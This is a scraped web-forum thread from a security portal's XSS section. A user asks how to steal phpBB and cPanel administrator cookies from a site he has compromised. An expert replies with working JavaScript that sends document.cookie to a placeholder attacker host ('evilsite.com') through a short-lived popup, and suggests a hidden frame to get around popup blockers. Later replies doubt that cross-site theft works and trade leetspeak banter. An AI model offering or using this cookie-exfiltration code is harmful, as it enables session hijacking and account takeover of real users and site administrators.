Waraxe IT Security Portal
Login or Register
November 17, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 64
Members: 0
Total: 64
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Cross-site scripting aka XSS -> again cookie stealin'
Post new topicReply to topic View previous topic :: View next topic
again cookie stealin'
PostPosted: Fri Oct 01, 2004 8:49 pm Reply with quote
Roberto
Regular user
Regular user
Joined: Sep 01, 2004
Posts: 8




i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.

i may direct people to that uploaded page,it is easy

but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?

of course i will upload an evil script to my site.

thanks again
View user's profile Send private message
PostPosted: Sun Dec 12, 2004 12:13 pm Reply with quote
Oguz
Regular user
Regular user
Joined: Nov 29, 2004
Posts: 7




i need this too ...
View user's profile Send private message
PostPosted: Sun Dec 12, 2004 1:55 pm Reply with quote
Heintz
Valuable expert
Valuable expert
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




there are very many ways you could do it i'll write here one from which
you can make a better one.

html 1
Code:

<html>
<head>
<title>reperdalaj</title>
<script language="JavaScript" src="foo.js"></script>
</head>

<body>
hi i'm evil page!
</body>

</html>


foo.js 1
Code:

var query = "www.evilsite.com/script.php?string=" + document.cookie;
var nWindow = window.open(query,'nwin','height=1;width=1');
nWindow.close();


this loads a popup window for very short time.
after remembering that there are pop-up blockers this will not probably work on many users.

you could make a frame instead and join the html and js, learning html and basic javascript helps. so take your time and google. Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
Re: again cookie stealin'
PostPosted: Sat Dec 18, 2004 3:59 pm Reply with quote
emrag
Regular user
Regular user
Joined: Jun 03, 2004
Posts: 20
Location: TURKEY




Roberto wrote:
i manage to upload html page(in another words javascripts ) to a vulnerable site.
the bug is not related with phpbb.but i manage to upload.

i may direct people to that uploaded page,it is easy

but what should i write to the uploaded page so i can steal phpbb cookies of that site?or admin cookie of the cpanel of that site?

of course i will upload an evil script to my site.

thanks again



i think this isn't possible so you want a phpbb's cookie but there is no XSS in it. you can't get a site's cookie with another site's XSS.
View user's profile Send private message MSN Messenger ICQ Number
PostPosted: Sun Feb 27, 2005 8:48 pm Reply with quote
Alkaen
Regular user
Regular user
Joined: Feb 16, 2005
Posts: 5
Location: Bahrain - Aldair




Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n

_________________
Alkaen with u..
View user's profile Send private message Visit poster's website
PostPosted: Fri Mar 04, 2005 6:20 am Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




Alkaen wrote:
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n


i did get shit
lol of course i got that but plz write neat thats ricicule**
View user's profile Send private message
PostPosted: Tue Dec 05, 2006 7:43 pm Reply with quote
faifas
Regular user
Regular user
Joined: Feb 25, 2005
Posts: 8




HaCkZataN wrote:
Alkaen wrote:
Y35 7h46'5 r!9h7 wh47 emrag $4!d.. y0u c4n7 937 a
$!73'5 C00k!3$ w!7h 4n07h3r $!73'5 X55.

41k43n


i did get shit
lol of course i got that but plz write neat thats ricicule**

3 = e
5 = s
$ = 5 = s
etc.
View user's profile Send private message Visit poster's website
again cookie stealin'
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.035 Seconds